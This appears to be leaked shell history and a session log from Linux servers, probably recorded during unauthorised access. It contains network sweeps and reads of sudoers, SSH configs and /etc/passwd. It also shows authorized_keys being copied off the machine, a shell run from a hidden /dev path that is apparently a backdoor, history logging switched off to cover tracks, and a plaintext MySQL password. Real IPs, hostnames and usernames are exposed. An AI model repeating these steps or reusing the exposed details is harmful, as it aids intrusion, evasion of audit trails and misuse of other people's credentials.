telnet 192.168.1.181
telnet 192.168.1.181 80
telnet 192.168.1.181 6667
telnet 192.168.1.181 22
telnet 192.168.1.181 21
telnet 192.168.1.181 8000
telnet 192.168.1.181 8080
telnet 192.168.1.181 567
nmap
nmap 192.168.1.181
nmap 192.168.1.181 -P0
nmap 192.168.1.0/24
nmap 192.168.1.0/24
lynx 192.168.1.104:8080
elinks 192.168.1.104:8080
nmap 192.168.1.0/24
elinks 192.168.1.102:8000
nmap 192.168.1.0/24
nmap 192.168.1.0/24 -v
elinks 192.168.1.1
w
xchat
firefox
mozilla
man -k sniff
ls /home
ls /home/Raster/
ls -al /home/Raster/
ls -al /home/Raster/.mozilla/
ls -al /home/Raster/.mozilla/firefox/
less /home/Raster/.mozilla/firefox/profiles.ini
ls -al /home/Raster/.mozilla/firefox/
ls -al /home/Raster/
echo $DISPLAY
firefox
echo $DISPLAY
export DISPLAY=localhost:10.0
firefox
ps x
firefox
export DISPLAY localhost:10.0
export DISPLAY=localhost:10.0
echo $DISPLAY
export DISPLAY=localhost:10
firefox
export DISPLAY=localhost:11
firefox
xconsole
xconsole
xterm
w
write root
w
w
w
w
w
w
w
w
w
w
w
w
broadcast
/sbin/broadcast
/usr/sbin/broadcast
/usr/local/sbin/broadcast
find / -name "*broad*"
find / -name "*broad*" 2> /dev/null
wall
fg
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
screen -x
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
ls -l /usr/bin/screen
screen -x
screen -ls
screen -e^Tt
echo $DISPLAY
XCHAT
xchat
echo $DISPLAY
export DISPLAY=71.192.64.22:10
xchat
export DISPLAY=71.192.64.22:0
xchat
export DISPLAY=71.192.64.22:10
xchat
export DISPLAY=71.192.64.22:0.2
xchat
screen -x
w
who
mozilla
ls
ls Incoming/
cd Incoming/
id
sudo su -
cat /etc/sudoers
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_config
ls
ls -l
ls -la
xdpyinfo
xterm
w
ps auxww | grep irc
w
dmesg
cat /proc//interrupts
/sbin/ifconfig
cat /proc/acpi/video/
ls /proc/acpi/video/
cat /proc/acpi/info
cat /proc/acpi/button/power/PWRF/info
cat /proc/acpi/button/sleep/SLPB/info
cat /proc/devices
cat /proc/irq/11/radeon\@pci\:0000\:00\:09.0/
cat /proc/misc
dmesg | grep eth0
lsmod
/sbin/lsmod
uname -a
dmesg | grep -i ra
dmesg | grep -i video
dmesg | grep - rade
dmesg | grep -i rade
dmesg | grep xrm
dmesg | grep drm
dmesg | grep 200
dmesg | grep 200
ps auxww | grep X
passwd
w
ps auxww|grep astrer
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|grep aster
ps auxww|less
ifconfig
/sbin/ifconfig
/sbin/iptables -L
/sbin/iptables
/sbin/iptables 00help
/sbin/iptables --help
/sbin/iptables -L -t nat
w
grep -i ipsec /etc/services
grep -i sec /etc/services
grep -i pptp /etc/services
grep -i pp /etc/services
grep -i 17 /etc/services
grep -i vpn /etc/services
ping -b 192.168.1.255
arp -a
/sbinarp -n
/sbin/arp -n
ping irc.humpmeg.net
ping irc.humpmeg.net
w
screen -x
ssh gumbie@www.zloche.net -v
ping www.zloche.net
ping server.zloche.net
ping server1.zloche.net
cat .ssh/authorized_keys
sz .ssh/authorized_keys
ls
ls .ssh
less .ssh/authorized_keys
ls -la .ssh
w
ps auxww|grep dead
ps auxww|grep pts/6
ps auxww|grep 508
w
ifconfig
/sbin/ifconfig
/sbin/arp -ae
screen -x
screen -ls
ssh 192.168.1.3
ssh 192.168.1.3
arp -en
/sbin/arp -en
ssh 192.168.1.3
ssh 192.168.1.3 -v
/sbin/arp -en
ping -b 192.168.1.255
ssh 192.168.1.3 -v
ssh 192.168.1.8 -v
ls /home
su - ircd
ls -la /var/log
w
w
fg
su - ircd
ssh ircd
ssh ircd@localhost
ssh ircd@localhost -P 443
ssh ircd@localhost -p443
/sbin/infconfig
/sbin/ifconfig
ping 192.168.1.255
ping -b 192.168.1.255
/sbin/arp -en
ping -b 192.168.1.255
ping -b 192.168.1.255
ping -b 192.168.1.255
ping -b 192.168.1.255
ping -b 192.168.1.255
ping 192.168.1.103
ssh -v 192.168.1.103
ssh -v 192.168.1.103
w
screen -x
screen -x
w
w
tty
ps x
irssi
epic
irc
xchat
xchat
export DISPLAY=71.192.64.22:0
xchat
export DISPLAY=71.192.64.22:1
xchat
export DISPLAY=71.192.64.22:0.0
xchat
export DISPLAY=71.192.64.22:10.0
xchat
export DISPLAY=71.192.64.22:10.1
xchat
export DISPLAY=127.0.0.1:10
xchat
export DISPLAY=127.0.0.1:0
xchat
export DISPLAY=127.0.0.1:0.10
xchat
man ssh
less /etc/ssh/sshd_config
less /etc/ssh/ssh_config
w
w
pico .screenrc
vi .screenrc
ls -la
mkdir Incoming
mv kibitz unreal.tgz Incoming/
w
w
/sbin/ifconfig
ssh -v 192.168.1.8
ps x
screen -ls
sudo su -
cat /etc/sudoers
ls /home
ls -la
ssh ircd
ssh ircd@localhost
ssh ircd@localhost -p 443
ssh ircd@localhost -p 443
ssh ircd@localhost -p 443
ssh ircd@localhost -p 443
ssh ircd@localhost -p 443
ps x
screen -ls
s
ssh ircd@localhost -p 443
sudo su -
ssh irc@localhost -p 443
ssh irc@localhost -p 443
w
w
screen -ls
screen -x
screen -e^Tt
screen -x
screen -x
pwd
touch test
ls -la
ls -la
sudo su -
ls -la
cd /root
su -
ls -l /dev/rstm01/bash
/dev/rstm01/bash sudo su -
/dev/rstm01/bash
man bash
w
uname -a
sudo su -
sudo su -
top
df
ls /mnt
ls /mnt/Rasterized/
ls /mnt/Rasterized/Rasterized\ Drive/
ls /mnt/Rasterized/Rasterized\ Drive/codecs/
ls /mnt/Rasterized/Guitar\ Pro\ 5/
ls /mnt/cstrike/
w
screen -x
ps x
top
dmesg
smbstatus
w
kill -1 -1
w
sudo su -
sudo su -
sudo su -
sudo su -
sudo su -
sudo su -
mysql -p
/usr/local/mysql/bin/mysql -p
/usr/local/mysql/bin/mysql -p
/usr/local/mysql/bin/mysql -p
/usr/local/mysql/bin/mysql -p
/usr/local/mysql/bin/mysql -p
sudo su -
sudo su -
sudo su -
sudo su -
mysqladmin -p shutdown
sudo su -
mysql -u ircd -p rasnet
screen -x
sudo su -
screen -x
sudo su -
screen -x
screen -ls
w
ps x
screen -e^Tt
screen -x
screen -x
uptime
ping escape.com
ping escape.com -c 10
sudo su -
sudo su -
screen -x
sudo su -
sudo su -
sudo su -
sudo su -
sudo su -
sudo su -
sudo su -
sudo su -
sudo su -
mysql -p -u gumbie
mysql -p -u gumbie
mysql -p -u gumbie
fg
fg
sudo su -
sudo su -
sudo su -
sudo su -
sudo su -
w
w
ps x
sudo su -
sudo su -
w
ps auxww | grep mysqld
mysql -p
mysql -p
w
screen -ls
screen -e^Gg
ls
rm *.tgz
screen -x
screen -e^Gg
ls
screen -x
screen -x
exit
ssh -p 22 irc3.zloche.net
ssh -p 22 irc3.zloche.net
ssh -p 22 irc3.zloche.net
screen -x
passwd
screen -x
screen -x
screen -x
screen -x
screen -x
screen -x
ls
screen -x
screen -e ^Tt
screen -x
man pdisk
man fdisk
man fdisk
man -k mbr
man gdisk
man -k disk | less
sudo su -
host irc.rasterized.net
screen -x
screen -e^Tt
screen -x
screen -x
screen -x
screen -x
screen -x
screen -e^Tt
screen -x
date
date
rdate -s date.nist.gov
rdate -s time.nist.gov
rdate -s time-a.nist.gov
rdate -a time-a.nist.gov
rdate -s time-a.nist.gov
screen -x
sudo rdate -a time-a.nist.gov
date
screen -e^Tt
screen -x
screen -x
screen -x
screen -x
[root@localhost gumbie]# cat .mysql_history
_HiStOrY_V2_
set\040password\040=\040password("vfr1000r");
\134q
show\040grants
;
show tables;
select * from anope_os_news;
use rasnet
flush tables with read lock;
show mast status;
show master status;
unlock tables
;
show mast status;
show master status;
select * from anope_ns_access \G
select * from anope_ns_core \G
\q
show databases
;
use gumbie
show tables;
use Raster
show tables
;
shot datbases
;
show databases;
use rasnet
show tables;
show master status \G
status;
show sessions
\G
show sessions
;
show ?
;
help show
\1q
\q
show master status
;
flush tables with read lock;
show master status
;
unlock tables
;
\q
[root@localhost gumbie]# exit
[deadlyacid@localhost ~]$ ssh zloche@80.248.208.223
The authenticity of host '80.248.208.223 (80.248.208.223)' can't be established.
RSA key fingerprint is 83:0f:75:06:d2:da:85:fd:1c:93:39:83:89:7c:25:99.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '80.248.208.223' (RSA) to the list of known hosts.
Password:
Linux vds349.sivit.org 2.6.12.6-xenU #1 SMP Fri Feb 24 01:08:35 CET 2006 i686 GNU/Linux
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sat Jun 9 15:57:56 2007 from bas10-montreal02-1177583918.dsl.bell.ca
vds349.sivit.org> unset HISTFILE ; unset SAVEHIST
vds349.sivit.org> bash
zloche@vds349:~$ unset HISTFILE ; unset SAVEHIST
zloche@vds349:~$ w
17:34:32 up 174 days, 14:23, 4 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
zloche pts/9 bas10-montreal02 15:57 19:17 0.01s 0.01s -bash
stax pts/7 :2.0 02Jan07 156days 0.05s 0.05s -bash
zloche pts/13 bas10-montreal02 15:57 52:29 0.02s 0.02s -bash
zloche pts/17 c-76-108-85-21.h 17:33 0.00s 0.02s 0.01s w
zloche@vds349:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1580 112 ? S 2006 3:33 init [4]
root 2 0.0 0.0 0 0 ? S 2006 0:49 [migration/0]
root 3 0.0 0.0 0 0 ? SN 2006 0:05 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S< 2006 4:27 [events/0]
root 5 0.0 0.0 0 0 ? S< 2006 0:01 [khelper]
root 6 0.0 0.0 0 0 ? S< 2006 0:00 [kthread]
root 7 0.0 0.0 0 0 ? S< 2006 0:00 [xenwatch]
root 8 0.0 0.0 0 0 ? S< 2006 0:00 [xenbus]
root 11 0.0 0.0 0 0 ? S< 2006 0:46 [migration/1]
root 12 0.0 0.0 0 0 ? SN 2006 0:01 [ksoftirqd/1]
root 13 0.0 0.0 0 0 ? S< 2006 0:49 [events/1]
root 16 0.0 0.0 0 0 ? S< 2006 0:25 [kblockd/0]
root 17 0.0 0.0 0 0 ? S< 2006 0:30 [kblockd/1]
root 49 0.0 0.0 0 0 ? S 2006 7:26 [kswapd0]
root 50 0.0 0.0 0 0 ? S< 2006 0:00 [aio/0]
root 51 0.0 0.0 0 0 ? S< 2006 0:00 [aio/1]
root 52 0.0 0.0 0 0 ? S< 2006 0:00 [xfslogd/0]
root 53 0.0 0.0 0 0 ? S< 2006 0:00 [xfslogd/1]
root 54 0.0 0.0 0 0 ? S< 2006 0:00 [xfsdatad/0]
root 55 0.0 0.0 0 0 ? S< 2006 0:00 [xfsdatad/1]
root 56 0.0 0.0 0 0 ? S 2006 0:30 [xfsbufd]
root 595 0.0 0.0 0 0 ? S 2006 30:27 [kjournald]
daemon 10217 0.0 0.1 1684 188 ? Ss 2006 0:00 /sbin/portmap
root 10289 0.0 0.1 1576 188 ? Ss 2006 0:01 /sbin/klogd
root 10677 0.0 0.0 2800 116 ? Ss 2006 0:00 /usr/sbin/famd -T
root 10706 0.0 0.3 1816 456 ? Ss 2006 0:45 /usr/sbin/cron
root 10734 0.0 0.1 1572 232 tty1 Ss+ 2006 0:00 /sbin/getty 38400
root 10735 0.0 0.2 2556 300 ? Ss 2006 0:00 /bin/sh /command/
root 10737 0.0 0.0 136 20 ? S 2006 3:41 svscan /service
root 10738 0.0 0.0 92 4 ? S 2006 0:00 readproctitle ser
root 10739 0.0 0.0 100 16 ? S 2006 26:51 supervise dnscach
root 10740 0.0 0.0 104 20 ? S 2006 0:00 supervise log
dnslog 10742 0.0 0.0 108 4 ? S 2006 5:12 multilog t /var/l
root 25936 0.0 1.2 24652 1680 ? Ss 2006 23:29 /usr/bin/spamd -d
root 13041 0.0 0.5 16924 672 ? S 2006 0:08 cpsrvd - waiting
ircd 13243 0.0 2.3 5716 3096 ? S Jan01 37:48 ./ircd
root 28865 0.0 0.3 4824 424 ? Ss Jan02 0:02 /usr/bin/X11/xfs
root 29047 0.0 0.2 2604 276 ? S Jan02 0:00 /bin/bash /etc/in
root 29048 0.0 0.2 2604 276 ? S Jan02 0:00 /bin/bash /etc/in
root 29049 0.0 0.2 11712 340 ? S Jan02 0:00 /usr/X11R6/bin/Xp
root 29051 0.0 0.2 2604 276 ? S Jan02 0:00 /bin/bash /etc/in
stax 29260 0.0 0.3 11412 508 ? S Jan02 2:08 Xtightvnc :1 -des
stax 29269 0.0 0.2 10900 384 ? S Jan02 0:07 x-window-manager
stax 29283 0.0 0.3 11760 528 ? Ss Jan02 3:47 xfce-mcs-manager
stax 3320 0.0 0.3 10176 508 ? S Jan02 52:56 Xtightvnc :2 -des
stax 3328 0.0 0.3 5480 452 ? S Jan02 4:55 xterm -geometry 8
stax 3329 0.0 0.2 10748 364 ? S Jan02 0:00 x-window-manager
stax 3336 0.0 0.3 11728 520 ? Ss Jan02 3:44 xfce-mcs-manager
stax 3337 0.0 0.2 2652 300 pts/7 Ss+ Jan02 0:00 -bash
root 18154 0.0 0.3 1828 404 ? Ss Jan09 0:00 /sbin/rpc.statd
nagios 14637 0.0 0.2 4412 304 ? Ss Feb02 0:00 ./ndo2db-2x -c /u
stax 8120 0.0 0.3 12336 532 ? S Feb02 3:43 ./sc_serv
stax 8121 0.0 0.3 12336 532 ? S Feb02 0:21 ./sc_serv
stax 8122 0.0 0.3 12336 532 ? S Feb02 14:41 ./sc_serv
stax 8123 0.0 0.3 12336 532 ? S Feb02 8:53 ./sc_serv
stax 8124 0.0 0.3 12336 532 ? S Feb02 15:06 ./sc_serv
stax 8174 0.0 0.3 15868 520 ? S Feb02 3:48 ./sc_serv
stax 8175 0.0 0.3 15868 520 ? S Feb02 0:22 ./sc_serv
stax 8176 0.0 0.3 15868 520 ? S Feb02 18:29 ./sc_serv
stax 8177 0.0 0.3 15868 520 ? S Feb02 8:38 ./sc_serv
stax 8178 0.0 0.3 15868 520 ? S Feb02 18:13 ./sc_serv
root 3360 0.0 0.3 1620 408 ? Ss Feb04 3:33 /sbin/syslogd
root 741 0.0 0.4 3804 588 ? Ss Feb04 0:59 /usr/sbin/sshd
cyrus 14369 0.0 0.1 2476 220 ? Ss Feb04 0:00 /usr/sbin/pwcheck
root 6103 0.0 0.2 1608 340 ? Ss Feb05 1:21 /usr/sbin/inetd
root 19002 0.0 0.4 2380 644 ? S Feb05 0:52 /bin/sh ./festiva
root 19012 0.0 0.3 23620 424 ? S Feb05 0:00 ./festival --serv
dnscache 19611 0.0 0.0 1432 116 ? S Feb05 0:01 /usr/local/bin/dn
www-data 8569 0.0 0.4 33460 624 ? S Mar01 0:24 /usr/local/bin/pe
www-data 8570 0.0 0.7 32472 1044 ? S Mar01 0:29 /usr/local/bin/pe
root 3052 0.0 0.0 0 0 ? Z Mar08 0:00 [festival] <defun
root 9328 0.0 0.2 2232 344 ? Ss Mar17 0:00 ftpd: accepting c
nagios 10388 0.0 0.4 2752 620 ? Ss Mar25 0:36 ./nagircbot -S -X
root 19029 0.0 0.1 1744 248 ? S Mar26 0:00 /usr/sbin/courier
root 19030 0.0 0.2 2416 292 ? S Mar26 0:00 /usr/lib/courier/
root 19032 0.0 0.2 2520 328 ? S Mar26 0:00 /usr/lib/courier/
root 19033 0.0 0.2 2416 292 ? S Mar26 0:00 /usr/lib/courier/
root 19034 0.0 0.2 2416 292 ? S Mar26 0:00 /usr/lib/courier/
root 19035 0.0 0.2 2520 328 ? S Mar26 0:00 /usr/lib/courier/
root 19036 0.0 0.2 2520 328 ? S Mar26 0:00 /usr/lib/courier/
gumbie 14873 0.0 1.1 3892 1484 ? Ss Apr18 0:24 SCREEN -e^Tt
gumbie 14874 0.0 0.4 2724 576 pts/5 Ss+ Apr18 0:00 /bin/bash
gumbie 14877 0.0 0.2 2712 312 pts/8 Ss Apr18 0:00 /bin/bash
root 14880 0.0 2.3 10840 3208 pts/8 S Apr18 0:02 -su
darwin 21215 0.0 0.5 2400 788 pts/8 S Apr18 2:09 ./psybnc
gumbie 24879 0.0 0.4 2712 540 pts/10 Ss Apr27 0:00 /bin/bash
zloche 26665 0.0 0.7 13572 980 ? S May01 0:19 php alwaysping.ph
gumbie 12756 0.0 0.2 2704 312 pts/12 Ss May04 0:00 /bin/bash
root 12759 0.0 0.3 2720 504 pts/12 S May04 0:00 -su
root 24211 0.0 0.2 6892 360 ? Ss May14 0:00 /usr/sbin/saslaut
root 24212 0.0 0.2 6892 360 ? S May14 0:00 /usr/sbin/saslaut
root 24213 0.0 0.2 6892 360 ? S May14 0:00 /usr/sbin/saslaut
root 24214 0.0 0.2 6892 360 ? S May14 0:00 /usr/sbin/saslaut
root 24215 0.0 0.2 6892 360 ? S May14 0:00 /usr/sbin/saslaut
root 24319 0.0 0.4 3028 604 ? Ss May14 0:30 /usr/lib/postfix/
zloche 1131 0.0 0.9 20352 1268 ? S May20 0:15 php server.php
test 19301 0.0 0.5 1964 744 ? Ss May26 0:04 ./linux
root 10077 0.0 0.0 0 0 ? S May26 0:13 [pdflush]
bind 3313 0.0 2.1 15800 2904 ? Ss May27 0:00 /usr/sbin/named -
bind 3314 0.0 2.1 15800 2904 ? S May27 0:01 /usr/sbin/named -
bind 3315 0.0 2.1 15800 2904 ? S May27 1:50 /usr/sbin/named -
bind 3316 0.0 2.1 15800 2904 ? S May27 1:46 /usr/sbin/named -
bind 3317 0.0 2.1 15800 2904 ? S May27 0:09 /usr/sbin/named -
bind 3318 0.0 2.1 15800 2904 ? S May27 0:58 /usr/sbin/named -
stats 9998 0.0 0.4 2732 612 pts/12 S+ May29 0:00 -su
ircd 20676 0.0 2.4 10456 3336 ? S May31 0:43 ./services
stats 22164 0.0 2.4 18444 3328 pts/12 S May31 0:32 ./neostats
root 23940 0.0 0.3 2124 412 pts/8 T May31 0:07 tail -F /var/log/
root 22268 0.0 1.9 63200 2668 pts/8 S Jun03 0:08 /usr/sbin/apache
root 25788 0.0 0.5 2720 712 pts/10 S Jun03 0:00 -su
postfix 32031 0.0 0.8 3356 1132 ? S Jun03 0:03 qmgr -l -t fifo -
root 17452 0.0 0.5 2384 672 pts/8 S Jun04 0:00 /bin/sh /usr/bin/
mysql 17489 0.0 3.9 48060 5296 pts/8 S Jun04 0:02 /usr/sbin/mysqld
root 17490 0.0 0.2 1564 312 pts/8 S Jun04 0:00 logger -p daemon.
mysql 17491 0.0 3.9 48060 5296 pts/8 S Jun04 0:00 /usr/sbin/mysqld
mysql 17492 0.0 3.9 48060 5296 pts/8 S Jun04 0:00 /usr/sbin/mysqld
mysql 17493 0.0 3.9 48060 5296 pts/8 S Jun04 0:00 /usr/sbin/mysqld
mysql 17494 0.0 3.9 48060 5296 pts/8 S Jun04 0:00 /usr/sbin/mysqld
mysql 17495 0.0 3.9 48060 5296 pts/8 S Jun04 0:00 /usr/sbin/mysqld
mysql 17497 0.0 3.9 48060 5296 pts/8 S Jun04 0:04 /usr/sbin/mysqld
mysql 17498 0.0 3.9 48060 5296 pts/8 S Jun04 0:04 /usr/sbin/mysqld
mysql 17499 0.0 3.9 48060 5296 pts/8 S Jun04 0:00 /usr/sbin/mysqld
mysql 17500 0.0 3.9 48060 5296 pts/8 S Jun04 0:00 /usr/sbin/mysqld
djdd 11579 0.0 0.4 2980 628 ? Ss Jun05 0:01 SCREEN irssi
djdd 11583 0.0 1.2 7728 1676 pts/15 Ss+ Jun05 0:32 irssi
djdd 11711 0.0 0.5 2684 784 pts/16 Ss+ Jun05 0:00 /bin/bash
rmachine 5873 0.0 0.8 2720 1204 pts/10 S+ Jun07 0:00 -su
root 20159 0.0 1.4 24652 1900 ? S Jun07 0:00 spamd child
root 20217 0.0 1.1 24652 1540 ? S Jun07 0:00 spamd child
nagios 12250 0.0 0.2 1892 288 ? SL Jun08 0:00 nsca -c /usr/loca
nagios 12355 0.0 0.7 8552 1040 ? Ss Jun08 0:09 /usr/local/nagios
nagios 12356 0.0 0.7 8552 1040 ? S Jun08 0:00 /usr/local/nagios
nagios 12357 0.0 0.7 8552 1040 ? S Jun08 0:00 /usr/local/nagios
nagios 12358 0.0 0.7 8552 1040 ? S Jun08 0:01 /usr/local/nagios
root 27785 0.0 2.8 7816 3800 ? S Jun08 0:48 python /usr/local
zloche 10886 0.0 2.3 14856 3212 ? S Jun08 0:46 php serveur_php4.
root 11148 0.0 0.0 0 0 ? S 08:31 0:00 [pdflush]
www-data 29732 0.0 6.6 63612 8960 pts/8 S 14:14 0:00 /usr/sbin/apache
root 29860 0.0 1.2 6548 1720 ? Ss 14:17 0:00 sshd: gumbie [pri
gumbie 29862 0.0 1.3 6696 1864 ? S 14:17 0:00 sshd: gumbie@pts/
gumbie 29865 0.0 1.1 2672 1488 pts/1 Ss 14:17 0:00 -bash
gumbie 29871 0.0 0.6 2588 896 pts/1 S+ 14:17 0:00 screen -x
darwin 29963 0.0 2.5 4768 3376 pts/8 S 14:18 0:00 /home/darwin/bot/
www-data 30078 0.0 6.1 63596 8300 pts/8 S 14:20 0:00 /usr/sbin/apache
www-data 30079 0.0 7.1 63836 9568 pts/8 S 14:20 0:00 /usr/sbin/apache
www-data 31284 0.0 6.6 63612 8904 pts/8 S 14:40 0:00 /usr/sbin/apache
www-data 31782 0.0 6.4 63596 8712 pts/8 S 14:49 0:00 /usr/sbin/apache
www-data 32514 0.0 6.1 63596 8272 pts/8 S 15:03 0:00 /usr/sbin/apache
www-data 588 0.0 6.4 63572 8600 pts/8 S 15:12 0:00 /usr/sbin/apache
www-data 1444 0.0 8.9 64432 12048 pts/8 S 15:27 0:00 /usr/sbin/apache
root 3196 0.0 1.3 6548 1752 ? Ss 15:57 0:00 sshd: zloche [pri
root 3198 0.0 1.3 6548 1752 ? S 15:57 0:00 sshd: zloche [pri
zloche 3200 0.0 1.3 6548 1844 ? S 15:57 0:00 sshd: zloche@pts/
zloche 3201 0.0 1.1 2696 1516 pts/9 Ss+ 15:57 0:00 -bash
root 3218 0.0 1.3 6548 1752 ? Ss 15:57 0:00 sshd: zloche [pri
root 3230 0.0 1.3 6548 1752 ? S 15:57 0:00 sshd: zloche [pri
zloche 3267 0.0 1.3 6712 1864 ? S 15:57 0:00 sshd: zloche@pts/
zloche 3268 0.0 1.1 2696 1532 pts/13 Ss+ 15:57 0:00 -bash
postfix 4660 0.0 0.8 3036 1132 ? S 16:21 0:00 pickup -l -t fifo
darwin 5691 0.0 1.1 2740 1596 pts/8 S+ 16:41 0:00 -su
rmachine 7943 0.0 0.8 2368 1156 ? S 17:22 0:00 ftpd: c-24-34-223
www-data 8415 0.0 5.5 63596 7480 pts/8 S 17:31 0:00 /usr/sbin/apache
www-data 8416 0.0 2.7 63332 3740 pts/8 S 17:31 0:00 /usr/sbin/apache
root 8475 0.0 1.3 7572 1768 ? Ss 17:33 0:00 sshd: zloche [pri
root 8477 0.0 1.3 7572 1768 ? S 17:33 0:00 sshd: zloche [pri
zloche 8479 0.0 1.4 7572 1884 ? S 17:33 0:00 sshd: zloche@pts/
zloche 8480 0.0 1.1 2688 1496 pts/17 Ss 17:33 0:00 -bash
postfix 8509 0.0 1.8 6020 2448 ? S 17:33 0:00 smtpd -n smtp -t
postfix 8511 0.0 0.8 3040 1140 ? S 17:33 0:00 proxymap -t unix
zloche 8580 0.0 1.1 2688 1492 pts/17 S 17:34 0:00 bash
root 8581 0.0 0.3 2104 504 ? S 17:34 0:00 sleep 60
zloche 8590 0.0 0.6 2556 860 pts/17 R+ 17:34 0:00 ps aux
zloche@vds349:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/home/nobody:/bin/bash
Debian-exim:x:102:102::/var/spool/exim4:/bin/false
sshd:x:100:65534::/var/run/sshd:/bin/false
smmta:x:101:104:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:103:105:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
sivit:x:0:0::/root:/bin/bash
dnscache:x:64017:64011::/var/dnscache:/bin/false
dnslog:x:64018:64011::/var/dnscache:/bin/false
postfix:x:104:106::/var/spool/postfix:/bin/false
mysql:x:105:108:MySQL Server,,,:/var/lib/mysql:/bin/false
ftp:x:1000:100::/dev/null:/noshuchshell
bind:x:106:109::/var/cache/bind:/bin/false
nagios:x:110:110::/usr/local/nagios:/bin/bash
